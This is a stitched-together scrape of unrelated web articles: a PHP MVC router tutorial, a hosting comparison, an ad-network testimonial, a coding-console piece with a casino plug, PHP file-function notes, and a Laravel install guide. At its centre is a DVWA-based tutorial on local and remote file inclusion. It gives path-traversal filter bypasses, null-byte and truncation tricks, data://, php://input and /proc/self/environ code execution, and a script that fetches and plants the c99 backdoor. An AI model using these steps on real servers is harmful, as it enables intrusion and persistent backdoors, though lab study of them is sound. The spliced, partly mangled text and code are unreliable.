Fictional view php file. Local and remote file injection: exploiting vulnerabilities and bypassing filters. Bypass filtering when including files locally

Of the patterns, I was satisfied with mvc, registry. For requests, I wrote a small abstraction layer, for routing - my own request parsing function.
The structure of the web application will be like this

application folder

The input file index.php includes bootstrap.php. That, in turn, connects the kernel, a config file, some libraries and starts the router.

Use Core\Route; require_once "lib/registry.php"; require_once "config.php"; require_once "lib/datebase.php"; require_once "core/model.php"; require_once "core/view.php"; require_once "core/controller.php"; require_once "core/route.php"; $router = new Route(); $router->start(); //start the router

The registry is simple:

Namespace Lib; class Lib_Registry ( static private $data = array(); static public function set($key, $value) ( ​​self::$data[$key] = $value; ) static public function get($key) ( return isset( self::$data[$key]) ? self::$data[$key] : null ) static public function remove($key) ( if (isset(self::$data[$key])) ( unset (self::$data[$key]);

Here are getters and setters for storing global values.

Use Lib\Lib_Registry;

define("PATH_SITE", $_SERVER["DOCUMENT_ROOT"]); define("HOST", "localhost"); define("USER", "root");

define("PASSWORD", "mypass");

Since we are planning to create an admin panel in the future, we will create the client and admin folders. By the way, our router will take into account subfolders, i.e. it will be possible to create subfolders in controllers (e.g. /about/contacts/contacts.php) and access it along its path /about/contacts/
So we started the router

/** * */ public function start() ( // catch AJAX request if ($this->getIsAjaxRequest()) ( ) session_start(); $this->dispatch(); ) /** * */ public function dispatch())( // the dispatcher receives a file matching the name of the controller, action and arguments $this->getDirections($file, $controller, $action, $args); /* ************ * include Controller - Model */ if (is_readable($file) == false) ( die ("File $file 404 Not Found"); ) // include controller include ($file); $model = str_replace("controller" , "model", $file); // Model additional if(is_readable($model))( // connect the model include($model); ) /* ****** get the class ** */ $controller = ucfirst($controller); $class = ucfirst($this->namespace)."\Controller_" . $controller; // create an instance $controller = new $class($this->controller_path_folder); if (is_callable(array( $controller, $action)) == false) ( die ("Action $action 404 Not Found"); ) // call the action $controller->$action($args)

The dispatcher calls the getDirections() method, i.e. get request directives. By default, the default controller is articles, the action is index.

/** * @param $file * @param $controller * @param $action * @param $args */ private function getDirections(&$file, &$controller, &$action, &$args) ( $route = ( empty($_SERVER["REQUEST_URI"])) ? "" : $_SERVER["REQUEST_URI"]; unset($_SERVER["REQUEST_URI"]); $route = trim($route, "/\\"); controller_path = $this->path; if (empty($route)) ( /* ******************* Default directions ******** */ $controller = "articles"; $action = "action_index"; $controller_path = $this->controller_path_folder = "application/controllers/$this->namespace/"; $file = $controller_path.$controller.".php"; ) else ( $parts = explode("/", $route); /* ************** namespace ********** */ if($parts = = "admin") ( $this->namespace = "admin"; array_shift($parts); ) /* ***************** folders & subfolders ***** ** */ $fullpath = $this->controller_path_folder = $controller_path . $this->namespace; foreach ($parts as $part) ( $fullpath .= DS . $part; if (is_dir($fullpath)) ( array_shift ($parts);


) if (is_file($fullpath . ".php")) ( array_shift($parts); $file = "$fullpath.php"; break; ) ) /* ************* ** Controller, Action, Params ******** */ if(!isset($part)) $part = "articles";

$controller = $part;
if(!$file) $file = $fullpath."/$part.php";

$action = array_shift($parts);

if(!$action) $action = "action_index";

else $action = "action_$action";

Most website users are either with Linux or Windows. This has got to do with the uptime. Both platforms ensure that your website is up 99% of the time.


One of the main differences between a Linux Reseller Hostingplan and the one provided by Windows is about customization. While you can experiment with both the players in several ways, Linux is way more customizable than Windows. The latter has features more than its counterpart and that is why many developers and administrators find Linux very customer-friendly.

2. Applications

Different reseller hosting services have different applications. Linux and Windows both have their own array of applications but the latter has an edge when it comes to numbers and versatility. This has got to do with the open source nature of Linux. Any developer can upload his app on the Linux platform and this makes it an attractive hosting provider to millions of website owners.

However, please note that if you are using Linux for web hosting but at the same time use the Windows OS, then some applications may not simply work.


While both the platforms are stable, Linux Reseller Hosting is more stable of the two. It being an open source platform, can work in several environments.This platform can be modified and developed every now and then.

4. .NET compatibility

It isn’t that Linux is superior to Windows in every possible way. When it comes to .NET compatibility, Windows steals the limelight. Web applications can be easily developed on a Windows hosting platform.

5. Cost advantages

Both the hosting platforms are affordable. But if you are feeling a cash crunch, then you should opt for Linux. It is free and that is why it is opted by so many developers and system administrators all around the world.

6. Ease of setup

Windows is easier to set up than its counterpart. All things said and done, Windows still retains its user-friendliness all these years.


Opt for Linux reseller hosting because it is more secure than Windows. This holds true especially for people running their E-commerce businesses.


Choosing between the twowill depend on your requirement and the cost flexibility. Both the hosting services have unique advantages. While Windows is easy to set up, Linux is cost effective, secure and is more versatile.

Back in March of this year, I had a very bad experience with a media company refusing to pay me and answer my emails. They still owe me thousands of dollars and the feeling of rage I have permeates everyday. Turns out I am not alone though, and hundreds of other website owners are in the same boat. It's sort of par for the course with digital advertising.

In all honesty, I"ve had this blog for a long time and I have bounced around different ad networks in the past. After removing the ad units from that company who stiffed me, I was back to square one. I should also note that I never quite liked Googles AdSense product, only because it feels like the “bottom of the barrel” of display ads. Not from a quality perspective, but from a revenue one.

From what I understand, you want Google advertising on your site, but you also want other big companies and agencies doing it as well. That way you maximize the demand and revenue.

After my negative experience I got to recommend a company called Newor Media. And if I"m honest I wasn"t sold at first mostly because I couldn"t find much information on them. I did find a couple decent reviews on other sites, and after talking to someone there, I decided to give it a try I will say that they are SUPER helpful. Every network I have ever worked with has been pretty short with me in terms of answers and getting going. They answered every question and it was a really encouraging process.

I"ve been running the ads for a few months and the earnings are about in line with what I was making with the other company. So I can"t really say if they are that much better than others, but where they do stand out is a point that I really want to make. The communication with them is unlike any other network I"ve ever worked it. Here is a case where they really are different:

They pushed the first payment to me on time with Paypal. But because I"m not in the U.S (and this happens for everyone I think), I got a fee taken out from Paypal. I emailed my representative about it, asking if there was a way to avoid that in the future.

They said that they couldn't avoid the fee, but that they would REIMBURSE ALL FEES.... INCLUDING THE MOST RECENT PAYMENT! Not only that, but the reimbursement payment was received within 10 MINUTES! When have you ever been able to make a request like that without having to be forwarded to the "finance department" to then never be responded to.

The bottom line is that I love this company. I might be able to make more somewhere else, I"m not really sure, but they have a publisher for life with me. I"m not a huge site and I don"t generate a ton of income, but I feel like a very important client when I talk to them. It's honestly a breath of fresh air in an industry that is ripe with fraud and non-responsiveness.

Microcomputers that have been created by the Raspberry Pi Foundation in 2012 have been hugely successful in sparking levels of creativity in young children and this UK based company began offering learn-to-code startup programs like pi-top an Kano. There is now a new startup that is making use of Pi electronics, and the device is known as Pip, a handheld console that offers a touchscreen, multiple ports, control buttons and speakers. The idea behind the device is to engage younger individuals with a game device that is retro but will also offer a code learning experience through a web based platform.

The amazing software platform being offered with Pip will offer the chance to begin coding in Python, HTML/CSS, JavaScript, Lua and PHP. The device offers step-by-step tutorials to get children started with coding and allows them to even make LEDs flash. While Pip is still a prototype, it will surely be a huge hit in the industry and will engage children who have an interest in coding and will provide them with the education and resources needed to begin coding at a young age.

Future of Coding

Coding has a great future, and even if children will not be using coding as a career, they can benefit from learning how to code with this new device that makes it easier than ever. With Pip, even the youngest coding enthusiasts will learn different languages ​​and will be well on their way to creating their own codes, own games, own apps and more. It is the future of the electronic era and Pip allows the basic building blocks of coding to be mastered.
Computer science has become an important part of education and with devices like the new Pip, children can start to enhance their education at home while having fun. Coding goes far beyond simply creating websites or software. It can be used to enhance safety in a city, to help with research in the medical field and much more. Since we now live in a world that is dominated by software, coding is the future and it is important for all children to at least have a basic understanding of how it works, even if they never make use of these skills as a career. In terms of the future, coding will be a critical component of daily life. It will be the language of the world and not knowing computers or how they work can pose challenges that are just as difficult to overcome as illiteracy.
Coding will also provide major changes in the gaming world, especially when it comes to online gaming, including the access of online casinos. To see just how coding has already enhanced the gaming world, take a look at a few top rated casino sites that rely on coding. Take a quick peek to check it out and see just how coding can present realistic environments online.

How Pip Engages Children

When it comes to the opportunity to learn coding, children have many options. There are a number of devices and hardware gizmos that can be purchased, but Pip takes a different approach with their device. The portability of the device and the touchscreen offer an advantage to other coding devices that are on the market. Pip will be fully compatible with electronic components in addition to the Raspberry Pi HAT system. The device uses standard languages ​​and has basic tools and is a perfect device for any beginner coder. The goal is to remove any barriers between an idea and creation and make tools immediately available for use. One of the other great advantages of Pip is that it uses a SD card, so it can be used as a desktop computer as well when it is connected to a monitor and mouse.
The Pip device would help kids and interested coder novice with an enthusiasm into learning and practicing coding. By offering a combination of task completion and tinkering to solve problems, the device will certainly engage the younger generation. The device then allows these young coders to move to more advanced levels of coding in different languages ​​like JavaScript and HTML/CSS. Since the device replicates a gaming console, it will immediately capture the attention of children and will engage them to learn about coding at a young age. It also comes with some preloaded games to retain attention, such as Pac-Man and Minecraft.

Innovations to Come

Future innovation largely depends on a child’s current ability to code and their overall understanding of the process. As children learn to code at an early age by using such devices as the new Pip, they will gain the skills and knowledge to create amazing things in the future. This could be the introduction of new games or apps or even ideas that can come to life to help with medical research and treatments. There are endless possibilities. Since our future will be controlled by software and computers, starting young is the best way to go, which is why the new Pip is geared towards the young crowd. By offering a console device that can play games while teaching coding skills, young members of society are well on their way to being the creators of software in the future that will change all our lives. This is just the beginning, but it is something that millions of children all over the world are starting to learn and master. With the use of devices like Pip, coding basics are covered and children will quickly learn the different coding languages ​​that can lead down amazing paths as they enter adulthood.


file_exists("test.txt")//Does the file exist? filesize("test.txt");//Find out the file size //The timestamp is returned: fileatime("test.txt");//Date of the last access to the file //date("d M Y", $atime); filemtime("test.txt");//Date of file modification //date("d M Y", $mtime); filectime("test.txt");//Date of file creation (Windows) //date("d M Y", $ctime);

Files: operating modes


resource fopen (string filename, string mode) // resource - returns a pointer to the file in case of success, or FALSE in case of error
Operating mode Description
r open file read-only;
r+ open the file for reading and writing;
w open the file for writing only. If it exists, then the current contents of the file are destroyed. The current position is set to the beginning;
w+ open the file for reading and writing. If it exists, then the current contents of the file are destroyed. The current position is set to the beginning;
A open the file for writing. The current position is set to the end of the file;
a+ open the file for reading and writing. The current position is set to the end of the file;
b process the binary file. This flag is required when working with binary files on Windows.

Opening and closing files in PHP


$fi = fopen("test.html", "w+") or die("Error"); //Examples $fi = fopen("","r"); $fi = fopen("", "r"); //Close fclose($fi)

Reading files in PHP


//Read the file fread(int fi, int length) $str = fread($fi, 5); // Read the first 5 characters echo $str;

// since the cursor has moved $str = fread($fi, 12); // Read the next 12 characters echo $str; fgets(int fi[, int length]) // Read a line from a file fgetss(int fi, int length [, string allowable]) // Read a line from a file and discard HTML tags // string allowable - tags that need to be left fgetc(int fi) //Reads a character from a file Initially, the Write will occur at the beginning of the file, by overwriting existing data, if any. Therefore, if you need to write something to the end of the file, you need to set the appropriate reading mode

, for example, a+ .


Cursor manipulation in PHP files

int fseek(int fi, int offset [, int whence]) //Setting the cursor // int fi - pointer to the file //offset - number of characters to move. //whence: //SEEK_SET - movement starts from the beginning of the file; //SEEK_CUR - movement starts from the current position; //SEEK_END - movement starts from the end of the file. fseek($fi, -10, SEEK_END); //Read the last 10 characters $s = fread($fi, 10); $pos = ftell($fi); //Find out the current position rewind($f)//reset the cursor bool feof($f) //end of file


array file(string filename) // Get the contents of the file in the form of an array // Another option for directly working with data file_get_contents(string filename) // Reading (getting the entire file in one line) // Writing to the file (initially overwritten) file_put_contents(string filename, mixed data[,int flag]); //FILE_APPEND // Write to the end of the file: file_put_contents("test.txt", "data", FILE_APPEND); //If you write an array, $array = array("I", "live"); file_put_contents("test.txt",$array); //then we get "Ilive"

Managing files in php


copy(string source, string destination); // Copying the file rename(str oldname, str newname); // Rename the file unlink(string filename); // Deleting a file

Uploading files to PHP server

//PHP.ini settings file_uploads (on|off) // allow or disallow file upload upload_tmp_dir // temporary folder for uploaded files. by default temporary folder upload_max_filesize (default = 2 Mb) // max. upload file size post_max_size // total size of the submitted form (must be larger than upload_max_filesize) // Simple upload


Working with files on the server


//Accept data $tmp = $_FILES["userfile"]["tmp_name"]; $name = $_FILES["userfile"]["name"]; //Move the file move_uploaded_file($tmp, name); move_uploaded_file($tmp, "upload/".name); // redirect the file to the upload folder // relative to the current file // What's in the $_FILES array $_FILES["userfile"]["name"] // file name, for example, test.html $_FILES["userfile"][" tmp_name"] // temporary file name (path) $_FILES["userfile"]["size"] // file size $_FILES["userfile"]["type"] // file type $_FILES["userfile"] ["error"] // 0 - no errors, number - yes

Sometimes file injection is called inclusion, sometimes it is considered as part of PHP injection (code injection). The latter is not entirely true, since file injection vulnerabilities are not necessarily related to code execution.

The vulnerability can occur when using (in PHP) expressions such as:

  • require_once,
  • include_once,
  • include,
  • require

Each of them has small nuances, but what they have in common is that they include a file in the program and execute it. These expressions can cause problems if they pass user input and the program does not filter it out enough.

By the way, yes, these are expressions, not functions. It is not necessary to write like this:


This option is more preferable:

Require "somefile.php";

But this is a retreat that has nothing to do with vulnerability.

If files are included using the expressions require_once, include_once, include, require, then we can say that code injection also takes place at the same time. However, it is possible to include files without running code on the server. For example, the website changes appearance based on the user's chosen topic. The name of the themes corresponds to the name of the HTML files that are read on the server. In this situation, if the request is formed in such a way as to read a file that is not intended for this (for example, a PHP file), then instead of executing the commands, it will display source PHP.

The user can specify a remote or local file as the inclusion file. Based on this, two corresponding varieties are distinguished:

  • local file injection
  • remote file injection

The danger of remote inclusion is the execution of arbitrary code on a vulnerable server. This is usually used for backdoor infections.

The danger of local file injection is that the user can display the contents of files that he does not have rights to view (program source codes, system files with settings and passwords). Also, with local inclusion, it is possible to execute third-party code (for example, for backdoor infection), if a file with malicious code was previously uploaded to the server, or the log poisoning method was used, or some other methods.

Local inclusion of files is no less dangerous than the introduction of remote files.

Exploiting Local File Embedding

You can try your hand at this vulnerability in Damn Vulnerable Web Application (DVWA). I'm using Web Security Dojo, where DVWA is already installed.

Let's start from a low level ( low DVWA Security).

Let's go to the File Inclusion page http://localhost/dvwa/vulnerabilities/fi/?page=include.php

  • http://localhost/dvwa/vulnerabilities/fi/?page=file1.php
  • http://localhost/dvwa/vulnerabilities/fi/?page=file2.php
  • http://localhost/dvwa/vulnerabilities/fi/?page=file3.php

If a value similar to a file name (file1.php, file2.php) is passed as an argument to a variable, then we can assume that an include is being used. Because the file extension .php, then most likely the file is being executed on the server (i.e., code injection is possible), and not just being displayed for display.

DVWA has a page http://localhost/dvwa/about.php, it is located two levels up, let's try to view it this way: http://localhost/dvwa/vulnerabilities/fi/?page=../../ about.php

Yes, there is a local inclusion vulnerability. When entering, transitions to upper directories are not filtered ( ../ ), the list of files for inclusion is not exhaustive (instead of the proposed file*.php, we chose about.php).

Sometimes included files are used, but the addresses may look, for example, like this: http://localhost/dvwa/vulnerabilities/fi/?page=file1. In this case, an extension can be added to the script and the script embeds a file whose name is finally formed in the script. Typically, a vulnerability in this form is difficult/impossible to exploit.

Often people like to give something like this as an example of exploiting local file inclusion:


As we can see, it worked. But since web browsers ignore /r/n (the characters new line), then we need to open the source code to make the entries readable:

Unfortunately, there are no passwords in the /etc/passwd file for a long time.

From the server you can pull various settings files, SSL certificates, in principle, any file that is open for reading by all users or for which the web server has sufficient rights to read:


As for shared hostings, sometimes you can look into other people’s folders (again, when incorrect setting user rights).


The task is complicated by the fact that we need to know the path to the file.

Operation of remote file injection

PHP is a very flexible and developer-friendly programming language. File embedding commands and some others perfectly recognize and correctly process not only local files, but also URLs...

Let's try to write the site URL https://site/ instead of the file name:


Look how interesting it turns out:

The following happened: the PHP interpreter received a command to include the file/site https://site/. He opened/downloaded the corresponding address and sent the resulting code to be executed as a PHP program. Since PHP only executes the code surrounded by the appropriate tags (in this case there was no code at all) and outputs everything else as is, the entire website page is output as is.

Of course, this vulnerability is interesting to us not because we can view other sites through one site.

  1. Generating/finding the backdoor source code
  2. We create the right one from the point of view PHP file to be executed on a server that stores the backdoor source code in a PHP file
  3. Save the received code to a TEXT file
  4. Upload this text file to a controlled server
  5. We save our backdoor on a vulnerable server using a remote file inclusion

I highlighted the word “text” for the reason that on the server under our control there should be a text file that should not be executed on our server. Our server only needs to show its contents.

To create a backdoor, you can use Weevely, PhpSploit, or you can take ready-made solutions. Let's use a ready-made one this time.

I will assign the $backdoor variable the source code of the backdoor, which I download from Github. Then I use the file_put_contents function to save the resulting source code into the c99unlimited.php file.

The code I posted in text file

$backdoor = file_get_contents(""); file_put_contents("c99unlimited.php", "$backdoor"); echo "done!";

It is available at

Now, using a remote include, we upload a backdoor to a vulnerable server.


Pay attention to the inscription done!, it is displayed by the script, i.e. everything probably worked out.

Since the script that includes the files is located in the http://localhost/dvwa/vulnerabilities/fi/ directory, and our new file with the backdoor should have been saved with the name c99unlimited.php, the full address of the backdoor on the vulnerable server should be: http: //localhost/dvwa/vulnerabilities/fi/c99unlimited.php

We check:

Great, now we have all the features a web server administrator could need... and those who have access to their server.

Bypass filtering when including files locally

Let's move on to the middle level ( medium) security (configurable in DVWA Security).

If we look at the source code (button View Source):

then we will see that now the symbols ../ are filtered. This will prevent us from moving to a directory higher than the one in which the vulnerable script is running.

Those. nothing will work like this:


Let's think about how filtering works in this case? Let’s say the word “bad” is filtered, then a line like

good bad good

after filtering it will look like this:

good good

And if you insert a line like this

bad bad xo

then after filtering (the “bad” will be removed) it will turn out


IN ../ we paste in the middle again ../ , it turns out …/./

Let's try this address http://localhost/dvwa/vulnerabilities/fi/?page=…/./…/./…/./…/./…/./…/./…/./etc/mysql/ my.cnf

It worked!

Another workaround could be to encode characters into hexadecimal encoding, an example of this line:

"../" can be replaced with "%2E%2E%2f".

Double hex encoding is also practiced, in which “../” is replaced by “%252E%252E%252F”

Local inclusion of files when adding an extension in a script

If the code including files looks like:

Those. If a .php or some other extension is added to any user input, this does not allow the request to be formed in such a way as to carry out an attack.

There are several techniques that are designed to discard the extension, but they can be considered obsolete since they work on PHP 5.3, and even then not all versions. However, web server administrators are clinically conservative and prefer not to touch anything if it works. Those. chance to meet a server with a very ancient PHP version there are, and you should know about these techniques.

Using the null byte %00 (null byte)

A null byte is added at the end of the request to ignore the extension:

The second method is called a path pruning attack. The bottom line is that PHP truncates paths longer than 4096 bytes. In this case, PHP opens the file correctly, even if there are slashes and dots at the end of its name. If you pass something like?param1=../../../../etc/passwd/./././././ as a parameter<…>(where ./ is repeated many thousands of times), then the end of the file along with the extension (which the script added, as a result of which the file name became includes/../../../../etc/passwd/././. /././<…>.php) will be discarded. And the file name will be includes/../../../../etc/passwd/./././././<…>. And since PHP is not confused by trailing slashes and ./ at the end of the file, it simply ignores them, in total PHP will open the file along the path includes/../../../../etc/passwd.

Bypassing filtering for remote file injection

As we already saw in the source code, the medium security level also filters out http:// and https://.

Now http://localhost/dvwa/vulnerabilities/fi/?. We will use exactly the same technique as to bypass filtering with local inclusion. Generated request:


And also note that it is not filtered, for example ftp, i.e. This option would work without any tricks at all:


Obtaining the source code of PHP scripts when including files from php://filter

This trick does not require remote file inclusion. Some kind of meta wrapper will be used php://filter.

Let's say we want to see the source code of the file file1.php, then for our situation the request will be composed like this:


Pay attention to the meaningless string of letters and numbers - this is the source code of the file file1.php in base64 encoding. Since it is base64, binary files are also supported.

Let's decode the file:

Remote code execution with php://input

This is not like file embedding and again does not require you to upload files.

To help, I will use the FireFox extension, you can also use it or any other program (for example, curl) that can transfer data using the POST method.

php://input has access to the raw HTTP request body, to understand what include("php://input") does, open the page


And in the body of the request, send the correct PHP code (for example, using the POST method). This will allow you to perform any function allowed on the remote server!

Remote code execution with data://

In addition, PHP supports the URL scheme data:// You can place the code directly in the GET parameter! The following test does not require any special tools, just a regular browser to perform the attack.


Some web application firewalls may notice a suspicious string in a URL and block the malicious request. But there is a way to encrypt the string with at least base64 encoding:

http://localhost/dvwa/vulnerabilities/fi/?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==

Execute arbitrary commands from /proc/self/environ

/proc/self/environ is a storage of process variables. If the Apache process has sufficient rights to access it, then when opening a web page that contains an include with a similar URL,

will output something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap , */*;q=0.1 HTTP_REFERER= ./../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..% 2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=.. %2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx. 1xx.6x [email protected] SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

pay attention to HTTP_USER_AGENT. Instead, you can substitute the correct PHP code, which will be executed on a remote server.

Etching and injection of logs when including files locally

Unfortunately, on latest versions Apache this method no longer works.

Its essence lies in the fact that the attacker’s code is injected into the web server logs. This can be done by substituting User-Agent, or even simply by passing it in a GET parameter.

Static injection of a remote file

Example of a static include:

You can use a static inclusion in very exotic situations. To inject malicious code, it is necessary to carry out a man-in-the-middle attack between two servers: one of which hosts the web application using the include, and the second hosts the file used for the inclusion.

Laravel requires Composer to manage the project dependencies. So before installing Laravel, make sure you have Composer installed on your system. In case you are hearing about Composer for the first time, it"s a dependency management tool for php similar to node"s npm.

To install Composer on your machine, check this post:

Installing Laravel on Windows:

Follow the below steps to install laravel on windows machine. No matter you have xampp/wamp stack, it works for both. On WAMP, make sure to install laravel on "www" folder and on XAMPP, obviously the "htdocs".

STEP-1) Open "htdocs" folder on XAMPP, hold SHIFT key and right click on the folder, and choose "open command window here". Alternatively, you can open command window and change directory to "xampp/htdocs".

STEP-2)Enter the following command.

Composer create-project laravel/laravel my_laravel_site --prefer-dist

Here "my_laravel_site" is the folder name where laravel files will be installed. Change this to your liking.

STEP-3) Now it's time to be patient as laravel installation is going to take some time.

STEP-4) Once installed, change directory to "my_laravel_site" (cd "my_laravel_site") on the command prompt and enter the below command.

Php artisan serve

STEP-5) This will show a message something like, "Laravel development server started:" along with an url.

STEP-6) Copy and paste the url on the browser. If things go right, you"d see the laravel welcome screen.

STEP-7) Done! You have successfully installed laravel on windows machine and ready to go with.

Setting Application Key:

Laravel requires little configuration after installation. It requires you to set the application key. This is a random string of 32 characters long used for encrypting session and other sensitive data. Usually this will be set automatically when you install laravel via composer or laravel installer.

In case it"s not set, you have to do it manually. First make sure to rename the ".env.example" file to ".env" on your application root. Then open command prompt and change to the laravel project folder. Now run the below command to generate the key.

Php artisan key:generate

Copy this generated key to the APP_KEY variable on ".env" file. Save and you are done.

Installing Specific Laravel Version:

The above given method will make composer to download and install the latest version of laravel. If you want to install earlier versions of laravel on your machine, make sure to include the respective version number on create-project command.

Composer create-project laravel/laravel=5.4 your-project-name --prefer-dist Read Also:

Likewise you can easily install laravel using composer on windows. I hope you find this tutorial useful. Please share it on your social circle if you like it.